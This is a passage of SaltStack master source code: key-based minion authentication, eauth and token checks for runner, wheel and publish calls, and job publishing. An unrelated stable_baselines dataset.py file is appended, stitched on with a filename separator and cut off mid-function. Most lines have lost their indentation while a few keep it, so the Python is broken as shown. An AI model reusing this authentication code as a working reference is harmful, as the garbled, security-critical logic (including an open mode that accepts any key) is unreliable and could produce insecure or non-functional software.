ret = getattr(self, func)(load)
log.trace(
'Master function call {0} took {1} seconds'.format(
func, time.time() - start
)
)
except Exception:
ret = ''
log.error(
'Error in function {0}:\n'.format(func),
exc_info=True
)
else:
log.error(
'Received function {0} which is unavailable on the master, '
'returning False'.format(
func
)
)
return self.crypticle.dumps(False)
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return self.crypticle.dumps(ret)
# encrypt with a specific AES key
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
key = salt.crypt.Crypticle.generate_key_string()
pcrypt = salt.crypt.Crypticle(
self.opts,
key)
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError:
return self.crypticle.dumps({})
pret = {}
pret['key'] = pub.public_encrypt(key, 4)
pret['pillar'] = pcrypt.dumps(
ret if ret is not False else {}
)
return pret
# AES Encrypt the return
return self.crypticle.dumps(ret)
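def _example_guarded_dispatch(obj, func, load):
    '''
    Hypothetical sketch of the dispatch rule AESFuncs.run_func() applies above:
    double-underscore names are never exposed, unknown names are rejected, and
    only then is the method looked up with getattr() and called with the
    decrypted load.
    '''
    if func.startswith('__') or not hasattr(obj, func):
        return False
    return getattr(obj, func)(load)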
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands are sent to the
master without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key, master_key, crypticle):
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.key = key
self.master_key = master_key
self.crypticle = crypticle
# Create the event manager
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
self.auto_key = salt.daemons.masterapi.AutoKey(opts)
def _auth(self, load):
'''
Authenticate the client, use the sent public key to encrypt the AES key
which was generated at start up.
This method fires an event over the master event manager. The event is
tagged "auth" and returns a dict with information about the auth
event
# Verify that the key we are receiving matches the stored key
# Store the key if it is not there
# Make an RSA key with the pub key
# Encrypt the AES key as an encrypted salt.payload
# Package the return and return it
'''
if not salt.utils.verify.valid_id(self.opts, load['id']):
log.info(
'Authentication request from invalid id {id}'.format(**load)
)
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication request from {id}'.format(**load))
minions = salt.utils.minions.CkMinions(self.opts).connected_ids()
# 0 is default which should be 'unlimited'
if self.opts['max_minions'] > 0:
if not len(minions) < self.opts['max_minions']:
# we reject new minions, minions that are already
# connected must be allowed for the mine, highstate, etc.
if load['id'] not in minions:
msg = ('Too many minions connected (max_minions={0}). '
'Rejecting connection from id '
'{1}'.format(self.opts['max_minions'],
load['id']))
log.info(msg)
eload = {'result': False,
'act': 'full',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': 'full'}}
# Check if key is configured to be auto-rejected/signed
auto_reject = self.auto_key.check_autoreject(load['id'])
auto_sign = self.auto_key.check_autosign(load['id'])
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
pubfn_pend = os.path.join(self.opts['pki_dir'],
'minions_pre',
load['id'])
pubfn_rejected = os.path.join(self.opts['pki_dir'],
'minions_rejected',
load['id'])
pubfn_denied = os.path.join(self.opts['pki_dir'],
'minions_denied',
load['id'])
if self.opts['open_mode']:
# open mode is turned on, nuts to checks and overwrite whatever
# is there
pass
elif os.path.isfile(pubfn_rejected):
# The key has been rejected, don't place it in pending
log.info('Public key rejected for {id}'.format(**load))
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
elif os.path.isfile(pubfn):
# The key has been accepted, check it
if salt.utils.fopen(pubfn, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys did not match. This may be an attempt to compromise '
'the Salt cluster.'.format(**load)
)
# put denied minion key into minions_denied
with salt.utils.fopen(pubfn_denied, 'w+') as fp_:
fp_.write(load['pub'])
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
elif not os.path.isfile(pubfn_pend):
# The key has not been accepted, this is a new minion
if os.path.isdir(pubfn_pend):
# The key path is a directory, error out
log.info(
'New public key {id} is a directory'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
if auto_reject:
key_path = pubfn_rejected
log.info('New public key for {id} rejected via autoreject_file'
.format(**load))
key_act = 'reject'
key_result = False
elif not auto_sign:
key_path = pubfn_pend
log.info('New public key for {id} placed in pending'
.format(**load))
key_act = 'pend'
key_result = True
else:
# The key is being automatically accepted, don't do anything
# here and let the auto accept logic below handle it.
key_path = None
if key_path is not None:
# Write the key to the appropriate location
with salt.utils.fopen(key_path, 'w+') as fp_:
fp_.write(load['pub'])
ret = {'enc': 'clear',
'load': {'ret': key_result}}
eload = {'result': key_result,
'act': key_act,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return ret
elif os.path.isfile(pubfn_pend):
# This key is in the pending dir and is awaiting acceptance
if auto_reject:
# We don't care if the keys match, this minion is being
# auto-rejected. Move the key file from the pending dir to the
# rejected dir.
try:
shutil.move(pubfn_pend, pubfn_rejected)
except (IOError, OSError):
pass
log.info('Pending public key for {id} rejected via '
'autoreject_file'.format(**load))
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'act': 'reject',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return ret
elif not auto_sign:
# This key is in the pending dir and is not being auto-signed.
# Check if the keys are the same and error out if this is the
# case. Otherwise log the fact that the minion is still
# pending.
if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'key in pending did not match. This may be an '
'attempt to compromise the Salt cluster.'
.format(**load)
)
# put denied minion key into minions_denied
with salt.utils.fopen(pubfn_denied, 'w+') as fp_:
fp_.write(load['pub'])
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
else:
log.info(
'Authentication failed from host {id}, the key is in '
'pending and needs to be accepted with salt-key '
'-a {id}'.format(**load)
)
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': True}}
else:
# This key is in pending and has been configured to be
# auto-signed. Check to see if it is the same key, and if
# so, pass on doing anything here, and let it get automatically
# accepted below.
if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an '
'attempt to compromise the Salt cluster.'
.format(**load)
)
# put denied minion key into minions_denied
with salt.utils.fopen(pubfn_denied, 'w+') as fp_:
fp_.write(load['pub'])
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
else:
pass
else:
# Something happened that I have not accounted for, FAIL!
            log.warning('Unaccounted for authentication failure')
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication accepted from {id}'.format(**load))
# only write to disk if you are adding the file, and in open mode,
# which implies we accept any key from a minion (key needs to be
# written every time because what's on disk is used for encrypting)
if not os.path.isfile(pubfn) or self.opts['open_mode']:
with salt.utils.fopen(pubfn, 'w+') as fp_:
fp_.write(load['pub'])
pub = None
# The key payload may sometimes be corrupt when using auto-accept
# and an empty request comes in
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError as err:
log.error('Corrupt public key "{0}": {1}'.format(pubfn, err))
return {'enc': 'clear',
'load': {'ret': False}}
ret = {'enc': 'pub',
'pub_key': self.master_key.get_pub_str(),
'publish_port': self.opts['publish_port']}
        # sign the master's pubkey (if enabled) before it is
        # sent to the minion that was just authenticated
if self.opts['master_sign_pubkey']:
# append the pre-computed signature to the auth-reply
if self.master_key.pubkey_signature():
log.debug('Adding pubkey signature to auth-reply')
log.debug(self.master_key.pubkey_signature())
ret.update({'pub_sig': self.master_key.pubkey_signature()})
else:
# the master has its own signing-keypair, compute the master.pub's
# signature and append that to the auth-reply
log.debug("Signing master public key before sending")
pub_sign = salt.crypt.sign_message(self.master_key.get_sign_paths()[1],
ret['pub_key'])
ret.update({'pub_sig': binascii.b2a_base64(pub_sign)})
if self.opts['auth_mode'] >= 2:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
else:
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(aes, 4)
else:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(
load['token'], 4
)
ret['token'] = pub.public_encrypt(mtoken, 4)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(self.opts['aes'], 4)
# Be aggressive about the signature
digest = hashlib.sha256(aes).hexdigest()
ret['sig'] = self.master_key.key.private_encrypt(digest, 5)
eload = {'result': True,
'act': 'accept',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return ret
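    # Key management sketch (hedged): the keys placed in minions_pre above are
    # the ones an operator lists and accepts from the CLI, e.g.:
    #
    #     salt-key -L              # list accepted / pending / rejected keys
    #     salt-key -a <minion_id>  # accept a pending key, as the log above suggests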
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
if 'token' in clear_load:
try:
token = self.loadauth.get_tok(clear_load['token'])
except Exception as exc:
msg = 'Exception occurred when generating auth token: {0}'.format(
exc)
log.error(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if not token:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if token['eauth'] not in self.opts['external_auth']:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if token['name'] not in self.opts['external_auth'][token['eauth']]:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
            good = self.ckminions.runner_check(
                self.opts['external_auth'][token['eauth']][token['name']]
                if token['name'] in self.opts['external_auth'][token['eauth']]
                else self.opts['external_auth'][token['eauth']]['*'],
                clear_load['fun'])
if not good:
msg = ('Authentication failure of type "token" occurred for '
'user {0}.').format(token['name'])
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.async(
fun,
clear_load.get('kwarg', {}),
token['name'])
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
return dict(error=dict(name=exc.__class__.__name__,
args=exc.args,
message=exc.message))
if 'eauth' not in clear_load:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
try:
name = self.loadauth.load_name(clear_load)
            if not ((name in self.opts['external_auth'][clear_load['eauth']]) |
                    ('*' in self.opts['external_auth'][clear_load['eauth']])):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
if not self.loadauth.time_auth(clear_load):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
            good = self.ckminions.runner_check(
                self.opts['external_auth'][clear_load['eauth']][name]
                if name in self.opts['external_auth'][clear_load['eauth']]
                else self.opts['external_auth'][clear_load['eauth']]['*'],
                clear_load['fun'])
if not good:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.async(fun,
clear_load.get('kwarg', {}),
clear_load.get('username', 'UNKNOWN'))
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
return dict(error=dict(name=exc.__class__.__name__,
args=exc.args,
message=exc.message))
except Exception as exc:
log.error(
'Exception occurred in the runner system: {0}'.format(exc)
)
return dict(error=dict(name=exc.__class__.__name__,
args=exc.args,
message=exc.message))
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
if 'token' in clear_load:
try:
token = self.loadauth.get_tok(clear_load['token'])
except Exception as exc:
msg = 'Exception occurred when generating auth token: {0}'.format(
exc)
log.error(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if not token:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if token['eauth'] not in self.opts['external_auth']:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if token['name'] not in self.opts['external_auth'][token['eauth']]:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
good = self.ckminions.wheel_check(
self.opts['external_auth'][token['eauth']][token['name']]
if token['name'] in self.opts['external_auth'][token['eauth']]
else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "token" occurred for '
'user {0}.').format(token['name'])
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
jid = salt.utils.gen_jid()
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': token['name']}
try:
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, **clear_load)
data['return'] = ret
data['success'] = True
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error(exc)
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
if 'eauth' not in clear_load:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
try:
name = self.loadauth.load_name(clear_load)
if not ((name in self.opts['external_auth'][clear_load['eauth']]) |
('*' in self.opts['external_auth'][clear_load['eauth']])):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
if not self.loadauth.time_auth(clear_load):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
good = self.ckminions.wheel_check(
self.opts['external_auth'][clear_load['eauth']][name]
if name in self.opts['external_auth'][clear_load['eauth']]
                else self.opts['external_auth'][clear_load['eauth']]['*'],  # not token: it is unbound in the eauth branch
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
jid = salt.utils.gen_jid()
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': clear_load.get('username', 'UNKNOWN')}
try:
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, **clear_load)
data['return'] = ret
data['success'] = True
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error(
'Exception occurred in the wheel system: {0}'.format(exc)
)
return dict(error=dict(name=exc.__class__.__name__,
args=exc.args,
message=exc.message))
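    # Shape of a successful wheel() reply (hedged, values illustrative):
    #
    #     {'tag': 'salt/wheel/20140101010203040506',
    #      'data': {'fun': 'wheel.key.list_all',
    #               'jid': '20140101010203040506',
    #               'tag': 'salt/wheel/20140101010203040506',
    #               'user': 'saltdev',
    #               'return': {...},
    #               'success': True}}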
def mk_token(self, clear_load):
'''
        Create and return an authentication token. The clear load needs to
        contain the eauth key and the needed authentication creds.
'''
if 'eauth' not in clear_load:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
log.warning('Authentication failure of type "eauth" occurred.')
return ''
try:
name = self.loadauth.load_name(clear_load)
if not ((name in self.opts['external_auth'][clear_load['eauth']]) |
('*' in self.opts['external_auth'][clear_load['eauth']])):
log.warning('Authentication failure of type "eauth" occurred.')
return ''
if not self.loadauth.time_auth(clear_load):
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return self.loadauth.mk_token(clear_load)
except Exception as exc:
log.error(
'Exception occurred while authenticating: {0}'.format(exc)
)
return ''
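    # Example external_auth master config consumed by mk_token()/runner()/wheel()
    # above (values are illustrative):
    #
    #     external_auth:
    #       pam:
    #         saltdev:
    #           - .*
    #           - '@runner'
    #           - '@wheel'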
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
        This method sends out publications to the minions; it can only be used
        by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
# check blacklist/whitelist
good = True
# Check if the user is blacklisted
for user_re in self.opts['client_acl_blacklist'].get('users', []):
if re.match(user_re, clear_load['user']):
good = False
break
# check if the cmd is blacklisted
for module_re in self.opts['client_acl_blacklist'].get('modules', []):
            # if this is a regular command, it's a single function
if type(clear_load['fun']) == str:
funs_to_check = [clear_load['fun']]
            # if this is a compound function
else:
funs_to_check = clear_load['fun']
for fun in funs_to_check:
if re.match(module_re, fun):
good = False
break
if good is False:
log.error(
'{user} does not have permissions to run {function}. Please '
'contact your local administrator if you believe this is in '
'error.\n'.format(
user=clear_load['user'],
function=clear_load['fun']
)
)
return ''
# to make sure we don't step on anyone else's toes
del good
# Check for external auth calls
if extra.get('token', False):
# A token was passed, check it
try:
token = self.loadauth.get_tok(extra['token'])
except Exception as exc:
log.error(
'Exception occurred when generating auth token: {0}'.format(
exc
)
)
return ''
if not token:
log.warning('Authentication failure of type "token" occurred.')
return ''
if token['eauth'] not in self.opts['external_auth']:
log.warning('Authentication failure of type "token" occurred.')
return ''
if not ((token['name'] in self.opts['external_auth'][token['eauth']]) |
('*' in self.opts['external_auth'][token['eauth']])):
log.warning('Authentication failure of type "token" occurred.')
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][token['eauth']][token['name']]
if token['name'] in self.opts['external_auth'][token['eauth']]
else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "token" occurred.'
)
return ''
clear_load['user'] = token['name']
log.debug('Minion tokenized user = "{0}"'.format(clear_load['user']))
elif 'eauth' in extra:
if extra['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
try:
name = self.loadauth.load_name(extra) # The username we are attempting to auth with
groups = self.loadauth.get_groups(extra) # The groups this user belongs to
                group_perm_keys = filter(lambda item: item.endswith('%'), self.opts['external_auth'][extra['eauth']])  # The configured auth groups
# First we need to know if the user is allowed to proceed via any of their group memberships.
group_auth_match = False
for group_config in group_perm_keys:
group_config = group_config.rstrip('%')
for group in groups:
if group == group_config:
group_auth_match = True
# If a group_auth_match is set it means only that we have a user which matches at least one or more
# of the groups defined in the configuration file.
# If neither a catchall, a named membership or a group membership is found, there is no need
# to continue. Simply deny the user access.
if not ((name in self.opts['external_auth'][extra['eauth']]) |
('*' in self.opts['external_auth'][extra['eauth']]) |
group_auth_match):
# A group def is defined and the user is a member
#[group for groups in ['external_auth'][extra['eauth']]]):
# Auth successful, but no matching user found in config
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
# Perform the actual authentication. If we fail here, do not continue.
if not self.loadauth.time_auth(extra):
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
except Exception as exc:
log.error(
'Exception occurred while authenticating: {0}'.format(exc)
)
return ''
# auth_list = self.opts['external_auth'][extra['eauth']][name] if name in self.opts['external_auth'][extra['eauth']] else self.opts['external_auth'][extra['eauth']]['*']
# We now have an authenticated session and it is time to determine
# what the user has access to.
auth_list = []
if name in self.opts['external_auth'][extra['eauth']]:
auth_list = self.opts['external_auth'][extra['eauth']][name]
if group_auth_match:
auth_list.append(self.ckminions.gather_groups(self.opts['external_auth'][extra['eauth']], groups, auth_list))
good = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob')
)
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
clear_load['user'] = name
# Verify that the caller has root on master
elif 'user' in clear_load:
if clear_load['user'].startswith('sudo_'):
# If someone can sudo, allow them to act as root
if clear_load.get('key', 'invalid') == self.key.get('root'):
clear_load.pop('key')
elif clear_load.pop('key') != self.key[self.opts.get('user', 'root')]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == self.opts.get('user', 'root'):
if clear_load.pop('key') != self.key[self.opts.get('user', 'root')]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == 'root':
if clear_load.pop('key') != self.key.get(self.opts.get('user', 'root')):
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == salt.utils.get_user():
if clear_load.pop('key') != self.key.get(clear_load['user']):
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
else:
if clear_load['user'] in self.key:
# User is authorised, check key and check perms
if clear_load.pop('key') != self.key[clear_load['user']]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
if clear_load['user'] not in self.opts['client_acl']:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
good = self.ckminions.auth_check(
self.opts['client_acl'][clear_load['user']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "user" '
'occurred.'
)
return ''
else:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
else:
if clear_load.pop('key') != self.key[salt.utils.get_user()]:
log.warning(
'Authentication failure of type "other" occurred.'
)
return ''
# Retrieve the minions list
minions = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob')
)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions
}
}
# Retrieve the jid
if not clear_load['jid']:
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
clear_load['jid'] = self.mminion.returners[fstr](nocache=extra.get('nocache', False))
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, 'new_job') # old dup event
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
log.critical(
'The specified returner used for the external job cache '
'"{0}" does not have a save_load function!'.format(
self.opts['ext_job_cache']
)
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"{0}" does not have a save_load function!'.format(
self.opts['master_job_cache']
)
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'user' in clear_load:
log.info(
'User {user} Published command {fun} with jid {jid}'.format(
**clear_load
)
)
load['user'] = clear_load['user']
else:
log.info(
'Published command {fun} with jid {jid}'.format(
**clear_load
)
)
log.debug('Published command details {0}'.format(load))
payload['load'] = self.crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
pub_sock.send(self.serial.dumps(int_payload))
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions
}
}
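# Sketch (hedged): the clear_load handled by publish() above is what the
# LocalClient builds for a call such as:
#
#     import salt.client
#     local = salt.client.LocalClient()
#     local.cmd('*', 'test.ping')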
|
dataset.py
|
import queue
import time
from multiprocessing import Queue, Process
import cv2
import numpy as np
from joblib import Parallel, delayed
from stable_baselines import logger
class ExpertDataset(object):
"""
Dataset for using behavior cloning or GAIL.
The structure of the expert dataset is a dict, saved as an ".npz" archive.
The dictionary contains the keys 'actions', 'episode_returns', 'rewards', 'obs' and 'episode_starts'.
The corresponding values have data concatenated across episode: the first axis is the timestep,
the remaining axes index into the data. In case of images, 'obs' contains the relative path to
the images, to enable space saving from image compression.
:param expert_path: (str) The path to trajectory data (.npz file). Mutually exclusive with traj_data.
:param traj_data: (dict) Trajectory data, in format described above. Mutually exclusive with expert_path.
:param train_fraction: (float) the train validation split (0 to 1)
for pre-training using behavior cloning (BC)
:param batch_size: (int) the minibatch size for behavior cloning
:param traj_limitation: (int) the number of trajectory to use (if -1, load all)
:param randomize: (bool) if the dataset should be shuffled
:param verbose: (int) Verbosity
    :param sequential_preprocessing: (bool) Do not use a subprocess to preprocess
        the data (slower, but uses less memory, e.g. for CI)
    :param special_shape: if truthy, keep the original observation/action shapes
        instead of flattening them to 2D arrays
    """
def __init__(self, expert_path=None, traj_data=None, train_fraction=0.7, batch_size=64,
traj_limitation=-1, randomize=True, verbose=1, sequential_preprocessing=False, special_shape=None):
if traj_data is not None and expert_path is not None:
raise ValueError("Cannot specify both 'traj_data' and 'expert_path'")
if traj_data is None and expert_path is None:
raise ValueError("Must specify one of 'traj_data' or 'expert_path'")
if traj_data is None:
